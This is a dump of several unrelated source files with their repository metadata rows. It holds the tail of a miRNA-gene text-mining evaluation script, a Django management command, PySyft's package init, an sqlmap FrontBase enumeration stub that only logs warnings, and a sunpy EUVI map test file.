('23113351','miR-29a','E2F1','MIR_GENE'),
('23113351','miR-29a','E2F3','MIR_GENE'),
('23148210','miR-210','HIF1A','GENE_MIR'), # was activated in ...-dependent
('23169590','miR-451','IL6','GENE_MIR'),
('23169590','miR-451','IFNA1','GENE_MIR'), #type I IFN
('23169590','miR-451','YWHAZ','MIR_GENE'),
('23169590','miR-451','YWHAD','MIR_GENE'), # has syn YWHAZ
#('23169590','miR-451','14-3-3zeta','MIR_GENE'), # is YWHAZ
('23169590','miR-451','ZFP36','MIR_GENE'),
#Three types of primary DCs treated with antisense RNA antagomirs directed against miR-451 secreted elevated levels of IL-6, TNF, CCL5/RANTES, and CCL3/MIP1alpha, and these results were confirmed using miR-451(null) cells.
#this suggests that miR-451 normally suppresses these genes
('23169590','miR-451','IL6','MIR_GENE'),
('23169590','miR-451','CCL3','MIR_GENE'),
('23169590','miR-451','CCL5','MIR_GENE'),
('23169590','miR-451','IFNB2','MIR_GENE'), #IL6
('23169590','miR-451','TNF','MIR_GENE'),
('23169590','miR-451','TNFA','MIR_GENE'), #TNF
#miR-451 levels are themselves increased by IL-6 and type I IFN, potentially forming a regulatory loop.
('23169590','miR-451','IL6','GENE_MIR'), #IL6
('23169590','miR-451','IFNA1','GENE_MIR'), #type I IFN
('23169590','miR-451','IFNB2','GENE_MIR'), #IL6
('23190607','miR-203','RAN','MIR_GENE'),
('23190607','miR-203','RAPH1','MIR_GENE'),
('23190607','miR-203','ALS2CR18','MIR_GENE'), # synonym
('23190608','miR-29b','SP1','GENE_MIR'),
('23190608','miR-29b','SP1','MIR_GENE'), # mirtex missing: miR-29b sensitizes multiple myeloma cells to bortezomib-induced apoptosis through the activation of a feedback loop with the transcription factor Sp1.
('23190608','miR-29b','DAND5','GENE_MIR'), # DAND5 has SP1 as syn
('23190608','miR-29b','DAND5','MIR_GENE'),
('23206698','miR-7','IRS2','MIR_GENE'),
('23396109','miR-17','PTEN','MIR_GENE'), #miR-17~92
('23396109','miR-17','MHAM','MIR_GENE'), # MHAM syn is PTEN too
('23396109','miR-17','BZS','MIR_GENE'), # BZS syn is PTEN too
#('23396109','miR-17','BIM','MIR_GENE'), # miR-17~92 is pten
('23396109','miR-17','BCL2L11','MIR_GENE'), # BCL2L11 syn is BIM
('23472202','miR-183','TAOK1','MIR_GENE'),
('23516615','miR-143','ERK5','MIR_GENE'),
('23516615','miR-143','PPARg','MIR_GENE'),
('23516615','miR-204','ERK5','MIR_GENE'),
('23516615','miR-204','PPARg','MIR_GENE'),
('23519125','miR-125a','erbB2','MIR_GENE'),
('23519125','miR-125a','erbB3','MIR_GENE'),
('23519125','miR-125b','erbB2','MIR_GENE'),
('23519125','miR-125b','erbB3','MIR_GENE'),
('23519125','miR-205','erbB2','MIR_GENE'),
('23519125','miR-205','erbB3','MIR_GENE'),
# these are not genes!
#('23527070','miR-21','collagen I','MIR_GENE'),
#('23527070','miR-21','collagen III','MIR_GENE'),
('23527070','miR-21','ELN','MIR_GENE'),
('23527070','miR-21','SMAD7','MIR_GENE'),
('23527070','miR-21','SMAD5','MIR_GENE'),
('23527070','miR-21','SMAD2','MIR_GENE'),
#('23534973','miR-152','HLA-G','MIR_GENE'), not a specific miRNA: miR-152 family
('23579289','miR-214','SP7','MIR_GENE'),
('23583389','miR-96','IRS1','MIR_GENE'),
('23592910','miR-146a','IL1B','GENE_MIR'),
('23592910','miR-146a','IFNG','GENE_MIR'),
#('23592910','miR-146a','TNFA','GENE_MIR'), # is TNF
('23592910','miR-146b','IL1B','GENE_MIR'),
('23592910','miR-146b','IFNG','GENE_MIR'),
('23592910','miR-146b','TNF','GENE_MIR'),
('23592910','miR-146a','IRAK','MIR_GENE'),
('23592910','miR-146b','IRAK','MIR_GENE'),
('23611780','miR-106b','FBXW11','MIR_GENE'), #beta-TRCP2
#('23611780','miR-106b','SNAIL','MIR_GENE'), nope. means cluster + indirect: miR-106b-25 cluster may play an important role in the metastasis of human non-small cell lung cancer cells by directly suppressing the beta-TRCP2 gene expression with a consequent increase in the expression of Snail.
('23611780','miR-93','FBXW11','MIR_GENE'),
('23630358','miR-155','MSR1','MIR_GENE'), # SR-AI syn
('23643257','miR-424','FGR','MIR_GENE'),
('23643257','miR-424','MAP2K1','MIR_GENE'),
('23643257','miR-424','MAPK1','MIR_GENE'), #mitogen-activated protein kinase 1
('23667495','miR-224','DPYSL2','MIR_GENE'),
('23667495','miR-224','KRAS','MIR_GENE'),
('23667495','miR-452','DPYSL2','MIR_GENE'),
('23667495','miR-452','KRAS','MIR_GENE'),
('23667495','miR-181c','KRAS','MIR_GENE'),
('23667495','miR-340','MECP2','MIR_GENE'),
('23667495','miR-181c','MECP2','MIR_GENE'),
('23667495','miR-340','KRAS','MIR_GENE'),
('23759586','miR-34a','SIRT1','MIR_GENE'),
('23759586','miR-125b','TP53','MIR_GENE'),
('23759586','miR-125b','SIRT1','MIR_GENE'),
('23797704','miR-21','TIMP3','MIR_GENE'),
('23797704','miR-221','TIMP3','MIR_GENE'),
('23797704','miR-21','SFD','MIR_GENE'),#is TIMP3
('23797704','miR-221','SFD','MIR_GENE'),#is TIMP3
('23797704','miR-217','TIMP3','MIR_GENE'),
('23797704','miR-217','SFD','MIR_GENE'), #is TIMP3
('23797704','miR-217','SIRT1','MIR_GENE'),
('23836497','miR-20','STAT3','MIR_GENE'),
('23836497','miR-20','CCND1','MIR_GENE'),
('23836497','miR-106a','STAT3','MIR_GENE'),
('23836497','miR-106a','CCND1','MIR_GENE'),
# same gene symbols
('23846856','miR-875','PRDX3','MIR_GENE'),
('23846856','miR-875','PRX','MIR_GENE'),
('23851184','miR-200b','WNT1','MIR_GENE'),
('23851184','miR-22','WNT1','MIR_GENE'),
('23895517','mir-494','TNFSF14','MIR_GENE'),
('23895517','mir-197','TNFSF14','MIR_GENE'),
('23968734','miR-133a','PDLIM5','MIR_GENE'), # LIM
#('23968734','miR-133a','SH3 protein 1','MIR_GENE'),
('23968734','miR-133a','LASP1','MIR_GENE'), #SH3 protein 1
('24006456','miR-29b','IGF1','MIR_GENE'),
('24006456','miR-30c','IGF1','MIR_GENE'),
('24006456','miR-29b','LIF','MIR_GENE'),
('24006456','miR-30c','LIF','MIR_GENE'),
('24006456','miR-29b','PTX3','MIR_GENE'),
('24023867','miR-135a','NR3C2','MIR_GENE'),
('24023867','miR-124','NR3C2','MIR_GENE'),
('24145190','miR-203','SNAI1','GENE_MIR'),
('24145190','miR-203','CD44','MIR_GENE'), # new, not in mirtex: we found that the levels of several EMT activators and miR-203 were positively and negatively correlated with those of CD44, respectively.
('24145190','miR-203','MDU3','MIR_GENE'),
('24145190','miR-203','MIC4','MIR_GENE'),
('24145190','miR-203','MDU2','MIR_GENE'),
('24145190','miR-203','SRC','GENE_MIR'), # missing in mirtex: Finally, we discovered that c-Src kinase activity was required for the downregulation of miR-203
('24155920','miR-21','SPRY1','MIR_GENE'),
('24155920','miR-29a','MCL1','MIR_GENE'),
('24155920','miR-29b','MCL1','MIR_GENE'),
#('24219008','miR-21-5p','TGFBR3','MIR_GENE'),
('24219008','miR-21','TGFBR3','MIR_GENE'), #add
('24219008','hsa-miR-21','TGFBR3','MIR_GENE'), #add
#('24219008','miR-21-5p','PDGFD','MIR_GENE'),
('24219008','miR-21','PDGFD','MIR_GENE'),
('24219008','hsa-miR-21','PDGFD','MIR_GENE'), #add
#('24219008','miR-21-5p','PPM1L','MIR_GENE'),
('24219008','miR-21','PPM1L','MIR_GENE'),
('24219008','hsa-miR-21','PPM1L','MIR_GENE'), #add
#('24219008','miR-181a-5p','ROPN1L','MIR_GENE'),
('24219008','miR-181a','ROPN1L','MIR_GENE'),
('24219008','hsa-miR-181a','ROPN1L','MIR_GENE'),
#('24219008','miR-181a-5p','SLC37A3','MIR_GENE'),
('24219008','hsa-miR-181a','SLC37A3','MIR_GENE'),
('24219008','miR-181a','SLC37A3','MIR_GENE'),
#('24219008','miR-24-2-5p','MYC','MIR_GENE'),
('24219008','hsa-miR-24-2','MYC','MIR_GENE'),
('24219008','hsa-miR-24','MYC','MIR_GENE'),
('24219008','miR-24-2','MYC','MIR_GENE'),
('24219008','miR-24','MYC','MIR_GENE'),
#('24219008','miR-24-2-5p','KCNJ2','MIR_GENE'),
('24219008','hsa-miR-24-2','KCNJ2','MIR_GENE'),
('24219008','hsa-miR-24','KCNJ2','MIR_GENE'),
('24219008','miR-24','KCNJ2','MIR_GENE'),
('24219008','miR-24-2','KCNJ2','MIR_GENE'),
('24219349','miR-203','BMI1','MIR_GENE'),
('24220339','miR-490','FOS','MIR_GENE'),
('24223656','miR-31','RASA1','MIR_GENE'),
('24314216','miR-106','TP53','MIR_GENE'),
('24319262','miR-34a','TP53','GENE_MIR'),
('24319262','miR-145','TP53','GENE_MIR'),
('24319262','miR-155','MAF','MIR_GENE'),
('24319262','miR-34a','TWIST2','MIR_GENE'),
('24319262','miR-34a','MAF','MIR_GENE'),
('24319262','miR-145','TWIST2','MIR_GENE'),
('24319262','miR-145','MAF','MIR_GENE'),
('24330780','miR-124','FLOT1','MIR_GENE'),
('24376808','miR-146a','CRK','MIR_GENE'),
('24376808','miR-424','CRK','MIR_GENE'),
('24376808','miR-146a','EGFR','MIR_GENE'),
('24376808','miR-424','EGFR','MIR_GENE'),
('24376808','miR-146a','MAPK14','MIR_GENE'), #p38 / ERK
('24376808','miR-424','MAPK14','MIR_GENE'),
('24376808','miR-146a','AIMP2','MIR_GENE'),#p38 / ERK
('24376808','miR-424','AIMP2','MIR_GENE'),
('24376808','miR-146a','AHSA1','MIR_GENE'),#p38 / ERK
('24376808','miR-424','AHSA1','MIR_GENE'),
]
refDict = defaultdict(set)
for x in referenceSolution:
    refDict[x[0]].add((x[1], x[2], x[3]))
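# The grouping pattern used for refDict can be exercised stand-alone. The toy
# tuples below are illustrative only (same (docID, miRNA, gene, direction)
# shape as referenceSolution, not taken from the actual curation):

```python
from collections import defaultdict

# Hypothetical toy triples; the duplicate entry collapses inside the set,
# which is why duplicates in the big list above are harmless.
toy_reference = [
    ("doc1", "miR-21", "PDCD4", "MIR_GENE"),
    ("doc1", "miR-21", "PTEN", "MIR_GENE"),
    ("doc1", "miR-21", "PDCD4", "MIR_GENE"),  # duplicate, deduplicated by the set
    ("doc2", "miR-150", "MYB", "MIR_GENE"),
]

toy_dict = defaultdict(set)
for doc_id, mir, gene, direction in toy_reference:
    toy_dict[doc_id].add((mir, gene, direction))

print(len(toy_dict["doc1"]), len(toy_dict["doc2"]))  # 2 1
```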
tmRemoveTMErrors = {
('19956414','miR-29b','MMRN1'), # ECM, extracellular matrix
('21415212','miR-486','GC'), #gastric cancer
('21415212','miR-486','HTC2'), #Array-CGH
('21415212','miR-486','EAF2'), #TRAITS
('21415212','miR-486','NF2'), #SCH cell line
('21703983', 'miR-632', 'PAFAH1B1'), # Notably, hsa-miR-378, hsa-miR-632, and hsa-miR-636 demonstrated particularly high discrimination between MDS and normal controls. MDS here is myelodysplastic syndromes
('21703983', 'hsa-miR-378', 'PAFAH1B1'),
('21703983', 'miR-378', 'PAFAH1B1'),
('21703983', 'hsa-miR-632', 'PAFAH1B1'),
('21703983', 'hsa-miR-636', 'PAFAH1B1'),
('21703983', 'miR-636', 'PAFAH1B1'),
('22066022', 'miR-21', 'FAM126A'), # HCC refers to hepatocellular carcinoma
('22066022', 'miR-21', 'ST14'), # HAI refers to histological activity index (HAI)
('22066022', 'miR-21', 'SPINT1'), # HAI refers to histological activity index (HAI)
('23643257','miR-424','FGR'), # recognizes FGR
('23643257','miR-424','FGFR1'),
('23643257','miR-424','KAL2'),
('23643257','miR-424','FLT2'),
('24330780','miR-124','TENM1'), #tumor node metastasis (TNM)
('24330780','miR-124','TNM'),
('24223656', 'miR-31', "TPT1"), # RAS p21 GTPase activating protein 1 (RASA1) => p21
('24223656', 'miR-31', "CDKN1A"),
('24223656', 'miR-31', "H3F3AP6"),
('24223656', 'miR-31', "TCEAL1"),
('24223656', 'miR-31', "NSG1"),
('21609717','miR-98','MT-CO2'), # accepts COX-2
('21609717','miR-98','COX8A'),
('21609717','miR-98','CPOX'),
('23527070', 'miR-21', 'SMAD5'), # SMAD2/5
('23190608','miR-29b','SUPT20H'), # SUPT20H has transcription-factor as syn
('18185580','miR-335', 'SUPT20H'),
('23113351','miR-29','RB1'), # RB1 syn: osteosarcoma
('23113351','miR-29a','RB1'), # RB1 syn: osteosarcoma
('23113351','miR-29b','RB1'), # RB1 syn: osteosarcoma
('22982443','miR-200c','CDH17'), # CDH17 syn for cadherin, found in E-cadherin ...
('20603081','miR-150','GLI2'), # THP-1 refers to cells
('22139444', 'miR-30c', 'NDC80'), # refers to HEC-1-B cells ...
('23041385', 'miR-21', 'CO'), # centenarian offspring (CO)
('23041385', 'miR-21', 'CALCR'), # CTR control
('19723773','miR-290','MEF'),#mouse embryo fibroblasts (MEF)
('19723773','miR-290','MEFV'),#mouse embryo fibroblasts (MEF)
('19723773','miR-290','ELF4'),#mouse embryo fibroblasts (MEF)
('19547998', 'miR-21', 'CALR'), # SSA
('19547998', 'miR-181b', 'CALR'),
('19547998', 'miR-21', 'HP'), # hyperplastic polyps
('19547998', 'miR-181b', 'HP'),
('20103675', 'miR-222', 'FAM126A'), # HCC cell lines
('24219349','miR-203','SP'), # side population
('24219349','miR-203','TFF2'), # SP
('21088996','miR-21','BLOC1S6'), # PDAC cells (MIA-Pa-Ca-2)
('21088996','miR-21','MIA'), # PDAC cells (MIA-Pa-Ca-2)
('21088996','miR-21','CAR2'), # PDAC cells (MIA-Pa-Ca-2)
('22847613','miR-130b','SLC22A3'), # epithelial-mesenchymal transition (EMT)
('22847613','miR-130b','ITK'), # epithelial-mesenchymal transition (EMT)
('22925189', 'miR-370', 'II'), #stage II <=> gene symbol
('22925189', 'miR-370', 'IV'), #stage IV <=> gene symbol
('22925189', 'miR-30a', 'II'), #stage II <=> gene symbol
('22925189', 'miR-30a', 'IV'), #stage IV <=> gene symbol
('23592910', 'miR-146a', 'IFNA1'), # TM mismatch with interferon in interferon gamma
('23592910', 'miR-146b', 'IFNA1'),
('24006456','miR-29b','INS'), # spurious hit with insulin-like growth factor
('24006456','miR-30c','INS'), # insulin-like
('20945501', 'miR-141', 'PC'), # matches PC / prostate cancer
('20945501', 'miR-141', 'PODXL'), # matches CRPC (castration-resistant prostate cancer)
}
# gene-mir: 36 F1: 0.88 *0.135 = 0.1188
# mir-gene: 230 F1: 0.94 *0.865 = 0.8131
# all: F1: 0.9319
sent2rels = defaultdict(set)
allSents = sentDB.get_all_sentences()
doc2Rels = defaultdict(set)
for mirID in mmuDB.ltype2rel:
    for rel in mmuDB.ltype2rel[mirID]:
        jel = rel.toJSON()
        sent2rels[rel.assocSent].add( (rel.lid, rel.rid, rel.assocInt, rel.assocCat, rel.lPOS, rel.rPOS) )
        docID = rel.assocSent.split(".")[0]
        doc2Rels[docID].add((rel.lid, rel.rid, rel.assocInt) )
for mirID in hsaDB.ltype2rel:
    for rel in hsaDB.ltype2rel[mirID]:
        jel = rel.toJSON()
        sent2rels[rel.assocSent].add( (rel.lid, rel.rid, rel.assocInt, rel.assocCat, rel.lPOS, rel.rPOS) )
        #print(rel.assocSent, rel.lid, rel.rid, rel.assocInt, rel.assocCat, relSent)
        docID = rel.assocSent.split(".")[0]
        doc2Rels[docID].add((rel.lid, rel.rid, rel.assocInt) )
from collections import Counter
#TM, REF
elemCaseCounter = Counter()
with open("test_list.bydoc.tsv", "w") as fout:
    print("doc", "lid", "rid", "assocInt", sep="\t", file=fout)

    allDocIDs = {x.split(".")[0] for x in allSents}

    for docID in natsorted(doc2Rels):
        for elems in doc2Rels[docID]:
            print(docID, *elems, sep="\t", file=fout)

        refOnly = refDict[docID].difference(doc2Rels[docID])
        tmOnly = doc2Rels[docID].difference(refDict[docID])
        tmOnly = [x for x in tmOnly if (docID, x[0], x[1]) not in tmRemoveTMErrors]
        correct = refDict[docID].intersection(doc2Rels[docID])

        for x in correct:
            elemCaseCounter[(True, True)] += 1
        for x in refOnly:
            elemCaseCounter[(False, True)] += 1
        for x in tmOnly:
            elemCaseCounter[(True, False)] += 1

        if len(doc2Rels[docID]) == 0 and len(refDict[docID]):
            continue
        if len(refOnly) == 0 and len(tmOnly) == 0:
            continue

        print(docID, len(correct), "REFONLY", refOnly)
        print(docID, len(correct), "TMONLY", tmOnly)
        print()
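# The per-document comparison relies on plain set algebra. A toy,
# self-contained illustration (the sets below are made up for the example,
# not real curation data): reference-only = missed relations, TM-only =
# candidate false positives, intersection = correct extractions.

```python
ref = {("miR-21", "PDCD4", "MIR_GENE"), ("miR-150", "MYB", "MIR_GENE")}
tm = {("miR-21", "PDCD4", "MIR_GENE"), ("miR-21", "GC", "MIR_GENE")}

ref_only = ref.difference(tm)   # in the reference but not found by TM
tm_only = tm.difference(ref)    # found by TM but not in the reference
correct = ref.intersection(tm)  # agreed on by both

print(len(ref_only), len(tm_only), len(correct))  # 1 1 1
```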
precision = elemCaseCounter[(True, True)] / (elemCaseCounter[(True, True)]+elemCaseCounter[(True, False)])
recall = elemCaseCounter[(True, True)] / (elemCaseCounter[(True, True)]+elemCaseCounter[(False, True)])
f1 = 2* precision * recall / (precision+recall)
#specificity = elemCaseCounter[(False, False)] / (elemCaseCounter[(True, False)] + elemCaseCounter[(False, False)])
print()
print()
print("True, True", elemCaseCounter[(True, True)])
print("TM Only", elemCaseCounter[(True, False)])
print("Ref Only", elemCaseCounter[(False, True)])
print()
print("precision", precision)
print("recall", recall)
#print("specificity", specificity)
print("f1", f1)
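# Sanity check of the precision/recall/F1 arithmetic used above, on assumed
# toy counts (tp/fp/fn are illustrative, not the script's real counters):

```python
tp, fp, fn = 230, 15, 20  # hypothetical true positives / false positives / false negatives

precision = tp / (tp + fp)
recall = tp / (tp + fn)
f1 = 2 * precision * recall / (precision + recall)

print(round(precision, 4), round(recall, 4), round(f1, 4))  # 0.9388 0.92 0.9293
```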
with open("test_list.tsv", "w") as fout:
    print("lid", "rid", "assocInt", "assocCat", "lpos", "rpos", "int_eval", "cat_eval", "sentID", "sent", sep="\t", file=fout)

    for sentID in natsorted(allSents):
        sent = allSents[sentID]

        allElems = sent2rels.get(sentID, None)
        if allElems is None:
            allElems = [ ("", "", "", "", "", "") ]

        for lid, rid, assocInt, assocCat, lpos, rpos in allElems:
            print(lid, rid, assocInt, assocCat, lpos, rpos, "FALSE", "FALSE", sentID, sent, sep="\t", file=fout)
| 40.963057 | 327 | 0.645572 | 4,524 | 32,156 | 4.490937 | 0.210212 | 0.124723 | 0.011813 | 0.015947 | 0.478663 | 0.22838 | 0.173155 | 0.121819 | 0.10282 | 0.078456 | 0 | 0.209179 | 0.091336 | 32,156 | 784 | 328 | 41.015306 | 0.486156 | 0.251586 | 0 | 0.058288 | 0 | 0 | 0.542566 | 0.005449 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.01275 | 0 | 0.01275 | 0.029144 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
8a8f3bc0b8648f6599b0f3f876b158891ab5ef13 | 267 | py | Python | huntserver/management/commands/runupdates.py | adenylyl/pi_day_puzzle_hunt | aa01cef427bc5f524e89558da72a2f79b0c78514 | [
"MIT"
] | 18 | 2017-03-07T19:53:03.000Z | 2022-02-24T04:58:47.000Z | huntserver/management/commands/runupdates.py | adenylyl/pi_day_puzzle_hunt | aa01cef427bc5f524e89558da72a2f79b0c78514 | [
"MIT"
] | 161 | 2016-11-14T00:04:42.000Z | 2021-06-10T17:25:17.000Z | huntserver/management/commands/runupdates.py | adenylyl/pi_day_puzzle_hunt | aa01cef427bc5f524e89558da72a2f79b0c78514 | [
"MIT"
] | 22 | 2016-09-27T18:00:10.000Z | 2022-03-13T17:51:44.000Z | from django.core.management.base import BaseCommand
from huntserver.utils import update_time_items
class RunUpdates(BaseCommand):
    help = 'Runs all time related updates for the huntserver app'

    def handle(self, *args, **options):
        update_time_items()
| 26.7 | 65 | 0.756554 | 35 | 267 | 5.657143 | 0.771429 | 0.10101 | 0.151515 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.168539 | 267 | 9 | 66 | 29.666667 | 0.891892 | 0 | 0 | 0 | 0 | 0 | 0.194757 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.166667 | false | 0 | 0.333333 | 0 | 0.833333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 2 |
8a98d4ac7dc115c2d7e6592d4b52a67512d27207 | 4,185 | py | Python | src/syft/__init__.py | aeroaks/PySyft | 88220c38faf3cd72ddc63c73f3c0533695df53c9 | [
"Apache-2.0"
] | null | null | null | src/syft/__init__.py | aeroaks/PySyft | 88220c38faf3cd72ddc63c73f3c0533695df53c9 | [
"Apache-2.0"
] | null | null | null | src/syft/__init__.py | aeroaks/PySyft | 88220c38faf3cd72ddc63c73f3c0533695df53c9 | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
"""
Welcome to the syft package! This package is the primary package for PySyft.
This package has two kinds of attributes: submodules and convenience functions.
Submodules are configured in the standard way, but the convenience
functions exist to allow for a convenient `import syft as sy` to then expose
the most-used functionalities directly on syft. Note that this way of importing
PySyft is the strict convention in this codebase. (Do not simply call
`import syft` and then directly use `syft.<method>`.)
The syft module is split into two distinct groups of functionality which we casually refer to
as syft "core" and syft "python". "core" functionality is functionality which is designed
to be universal across all Syft languages (javascript, kotlin, swift, etc.).
Syft "python" includes all functionality which by its very nature cannot be
truly polyglot. Syft "core" functionality includes the following modules:
* :py:mod:`syft.core.node` - APIs for interacting with remote machines you do not directly control.
* :py:mod:`syft.core.message` - APIs for serializing messages sent between Client and Node classes.
* :py:mod:`syft.core.pointer` - Client side API for referring to objects on a Node
* :py:mod:`syft.core.store` - Server side API for referring to object storage on a node (things pointers point to)
Syft "python" functionality includes the following modules:
* :py:mod:`syft.ast` - code generates external library common syntax tree using an allowlist list of methods
* :py:mod:`syft.typecheck` - automatically checks and enforces Python type hints and the exclusive use of kwargs.
* :py:mod:`syft.lib` - uses the ast library to dynamically create remote execution APIs for supported Python libs.
IMPORTANT: syft.core should be very careful when importing functionality from outside of syft
core!!! Since we plan to drop syft core down to a language (such as C++ or Rust)
this can create future complications with lower level languages calling
higher level ones.
To begin your education in Syft, continue to the :py:mod:`syft.core.node.vm.vm` module...
"""
# stdlib
from pathlib import Path
import sys
# third party
from pkg_resources import DistributionNotFound # noqa: F401
from pkg_resources import get_distribution # noqa: F401
# syft absolute
# ABSTRACT OBJECT IMPORTS
from syft.core import common # noqa: F401
from syft.core.common import event_loop # noqa: F401
# Convenience Methods
from syft.core.common.serde.deserialize import _deserialize as deserialize # noqa: F401
from syft.core.common.serde.serialize import _serialize as serialize # noqa: F401
from syft.core.node.common.service.repr_service import ReprMessage # noqa: F401
from syft.core.node.device.device import Device # noqa: F401
from syft.core.node.device.device import DeviceClient # noqa: F401
from syft.core.node.domain.domain import Domain # noqa: F401
from syft.core.node.domain.domain import DomainClient # noqa: F401
from syft.core.node.network.network import Network # noqa: F401
from syft.core.node.network.network import NetworkClient # noqa: F401
# Convenience Constructors
from syft.core.node.vm.vm import VirtualMachine # noqa: F401
from syft.core.node.vm.vm import VirtualMachineClient # noqa: F401
# Convenience Functions
from syft.decorators import type_hints # noqa: F401
from syft.grid.duet import bcolors # noqa: F401
from syft.grid.duet import duet # noqa: F401
from syft.grid.duet import join_duet # noqa: F401
from syft.grid.duet import launch_duet # noqa: F401
# Convenience Objects
from syft.lib import lib_ast # noqa: F401
from syft.lib import load_lib # noqa: F401
from syft.lib.torch.module import Module # noqa: F401
# syft relative
# Package Imports
from . import lib # noqa: F401
from . import logger # noqa: F401
# VERSIONING
try:
    # Change here if project is renamed and does not equal the package name
    dist_name = __name__
    __version__ = get_distribution(dist_name).version
except DistributionNotFound:
    __version__ = "unknown"
finally:
    del get_distribution, DistributionNotFound
sys.path.append(str(Path(__file__)))
logger.add(sink=sys.stderr, level="CRITICAL")
| 44.521277 | 114 | 0.774194 | 627 | 4,185 | 5.116427 | 0.379585 | 0.062344 | 0.067332 | 0.079801 | 0.235349 | 0.192643 | 0.166459 | 0.131546 | 0.079801 | 0 | 0 | 0.021457 | 0.153644 | 4,185 | 93 | 115 | 45 | 0.884246 | 0.630824 | 0 | 0 | 0 | 0 | 0.01 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.75 | 0 | 0.75 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 2 |
8a9f8e3b371f4a3d8597afaef08cf1cd3f5dcb90 | 910 | py | Python | packages/sqlmap-master/plugins/dbms/frontbase/enumeration.py | ZooAtmosphereGroup/HelloPackages | 0ccffd33bf927b13d28c8f715ed35004c33465d9 | [
"Apache-2.0"
] | null | null | null | packages/sqlmap-master/plugins/dbms/frontbase/enumeration.py | ZooAtmosphereGroup/HelloPackages | 0ccffd33bf927b13d28c8f715ed35004c33465d9 | [
"Apache-2.0"
] | null | null | null | packages/sqlmap-master/plugins/dbms/frontbase/enumeration.py | ZooAtmosphereGroup/HelloPackages | 0ccffd33bf927b13d28c8f715ed35004c33465d9 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python
"""
Copyright (c) 2006-2021 sqlmap developers (http://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
from lib.core.data import logger
from plugins.generic.enumeration import Enumeration as GenericEnumeration
class Enumeration(GenericEnumeration):
def getBanner(self):
warnMsg = "on FrontBase it is not possible to get the banner"
logger.warn(warnMsg)
return None
def getPrivileges(self, *args, **kwargs):
warnMsg = "on FrontBase it is not possible to enumerate the user privileges"
logger.warn(warnMsg)
return {}
def getHostname(self):
warnMsg = "on FrontBase it is not possible to enumerate the hostname"
logger.warn(warnMsg)
def getStatements(self):
warnMsg = "on FrontBase it is not possible to enumerate the SQL statements"
logger.warn(warnMsg)
return []
| 27.575758 | 84 | 0.684615 | 113 | 910 | 5.513274 | 0.513274 | 0.057785 | 0.11557 | 0.128411 | 0.301766 | 0.301766 | 0.301766 | 0.301766 | 0.301766 | 0.239165 | 0 | 0.011461 | 0.232967 | 910 | 32 | 85 | 28.4375 | 0.881089 | 0.141758 | 0 | 0.222222 | 0 | 0 | 0.301423 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.222222 | false | 0 | 0.111111 | 0 | 0.555556 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 2 |
8aac9198e1ca17cfd23654e404dcbbfca380cdae | 1,377 | py | Python | sunpy/map/sources/tests/test_euvi_source.py | PritishC/sunpy | 76a7b5994566674d85eada7dcec54bf0f120269a | [
"BSD-2-Clause"
] | null | null | null | sunpy/map/sources/tests/test_euvi_source.py | PritishC/sunpy | 76a7b5994566674d85eada7dcec54bf0f120269a | [
"BSD-2-Clause"
] | null | null | null | sunpy/map/sources/tests/test_euvi_source.py | PritishC/sunpy | 76a7b5994566674d85eada7dcec54bf0f120269a | [
"BSD-2-Clause"
] | null | null | null | """Test cases for STEREO Map subclasses.
This particular test file pertains to EUVIMap.
@Author: Pritish C. (VaticanCameos)
"""
import os
import glob
from sunpy.map.sources.stereo import EUVIMap
from sunpy.map import Map
from sunpy.sun import sun
import sunpy.data.test
path = sunpy.data.test.rootdir
fitspath = glob.glob(os.path.join(path, "euvi_20090615_000900_n4euA_s.fts"))
euvi = Map(fitspath)
# EUVI Tests
def test_fitstoEUVI():
    """Tests the creation of EUVIMap using FITS."""
assert isinstance(euvi, EUVIMap)
def test_is_datasource_for():
"""Test the is_datasource_for method of EUVIMap.
Note that header data to be provided as an argument
can be a MetaDict object."""
assert euvi.is_datasource_for(euvi.data, euvi.meta)
def test_measurement():
"""Tests the measurement property of the EUVIMap object."""
assert euvi.measurement.value == 171
def test_observatory():
"""Tests the observatory property of the EUVIMap object."""
assert euvi.observatory == "STEREO A"
def test_rsun_obs():
"""Tests the rsun_obs property"""
assert euvi.rsun_obs.value == euvi.meta['rsun']
def test_rsun_missing():
"""Tests output if 'rsun' is missing"""
euvi_no_rsun = Map(fitspath)
euvi_no_rsun.meta['rsun'] = None
assert euvi_no_rsun.rsun_obs.value == sun.solar_semidiameter_angular_size(euvi.date).to('arcsec').value
